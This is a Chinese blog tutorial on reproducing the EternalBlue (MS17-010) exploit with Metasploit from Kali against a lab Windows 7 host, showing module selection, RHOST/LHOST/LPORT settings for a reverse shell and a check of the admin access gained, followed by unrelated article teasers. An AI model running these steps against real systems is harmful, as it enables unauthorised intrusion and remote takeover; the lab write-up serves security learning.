Kali中MSF利用永恒之蓝(复现)

news/2024/10/3 21:19:17

Kali中MSF利用永恒之蓝(复现)

1、进入MSF框架:

image-20240613211232940

2、搜索MS17_010漏洞:

image-20240613211358399

这里找到了四个模块:0、1、4是漏洞利用模块;2、3是辅助模块,主要探测主机是否存在MS17_010漏洞。

3、利用Auxiliary辅助探测模块对漏洞进行探测(查看下所需要的参数):

image-20240613211421447

4、设置要探测的远程目标(两种方式探测):

(有[+]号的就是可能存在漏洞的主机,这里有1个主机存在漏洞)

image-20240613211446016

5、设置Exploit漏洞利用模块利用‘ms17_010_eternalblue’,并查看可攻击的系统平台来显示当前攻击模块针对哪些特定操作系统版本:

image-20240613211502816

image-20240613211510801

6、设置Payload攻击载荷模块(重点):

image-20240613211528835

7、查看该模块下所需要的参数:

image-20240613211544799

8、参数设置:

set RHOST 192.168.126.129     #设置RHOST,也就是要攻击主机的ip

set LHOST 192.168.126.134     #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell

set lport 7777           #设置lport,也就是我们主机的端口,反弹shell到这个端口;如果我们这里不设置lport的话,默认是4444端口监听;

image-20240613211630619

9、进行攻击:

(写run或者exploit都行)

image-20240613211644230

10、漏洞利用:

image-20240613211655285

在这里呢由于我们是通过系统的内核漏洞渗透进Windows7,输入getuid进行查看,得知当前权限为管理员权限。

ps查看肉鸡进程,说明了该漏洞是利用Windows上的spoolsv.exe进程实现的,且权限很高:

image-20240613211710912

image-20240613211719696

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/44513.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

B - Ticket Counter

B - Ticket Counter https://atcoder.jp/contests/abc358/tasks/abc358_b思路 第i个完成的时刻,done[i] 跟第i-1完成时间done[i-1]有关系, 第i个的开始时刻t[i] 大于 done[i-1], done[i] = t[i]+a第i个的开始时刻t[i] 不大于 done[i-1], done[i] = done[i-1]+aCode https…

使用Kimi+Markmap总结文件内容生成思维导图原创

一份文件内容太长,完整阅读下来太费时间,但如果使用AI进行内容提炼,再总结成思维导图,方便快速看到这份文件的核心内容和主题结构,就会极大地节约时间,目前就可以使用Kimi+Markmap这两个工具,帮我们把ppt、word、pdf等文件内容快速总结成思维导图。 一、工具准备 Kimi,…

vue状态共享--VUEX

一,VUEX是什么 Vue中跨组件状态管理模式+库 包含以下几个部分: 状态:State,驱动应用的数据源; 视图:Vue组件,以声明方式将状态映射到视图; 操作:Action,响应在视图上的用户输入导致的状态变化。

2024/4/1

今天完成了结对作业,完成了web端和手机端的主要功能, 其中数据库分为两个表,第一个表简单的记录地铁每条线的id以及地铁线的名字,第二个表是主用表,同时存储许多数据,存储线路上节点的id 上一站点的id以及下一站点的id 还有本站点的名字,以及本站点在本线路的顺序,是否…

Codeforces Round 953 Div.2 F 题解

经典蹭热度连通块计数的一种常见思路是钦定代表元,但发现这题的连边方式并不好指定一个代表元,那么只能尝试优化建图。 我们尝试观察一下连边的情况,通过手玩样例获得一些几何直观的感受: 3 4 5 5 3 4 4 5 3这个样例也许比较小,不过你真的把边画出来就会发现:连边形如 \(…

Docker系列 V1 - 在 Ubuntu 24.04 LTS 上安装 Docker

在 Ubuntu 24.04 LTS 上,虽然可以通过 Ubuntu 的官方仓库直接安装 Docker,但是这种方法通常无法获取到最新的 Docker 版本,而且安全更新也可能延迟。 因此,推荐从 Docker 的官方仓库进行安装,确保可以用上最新版本并和自动更新。 第 1 步:更新软件包并安装必要软件 运行以…

【JavaWeb】SpringBootWeb请求响应

前言 在上一次,我们开发了springbootweb的入门程序。 基于SpringBoot的方式开发一个web应用,浏览器发起请求 /hello 后 ,给浏览器返回字符串 “Hello World ~”。其实呢,是我们在浏览器发起请求,请求了我们的后端web服务器(也就是内置的Tomcat)。而我们在开发web程序时呢,…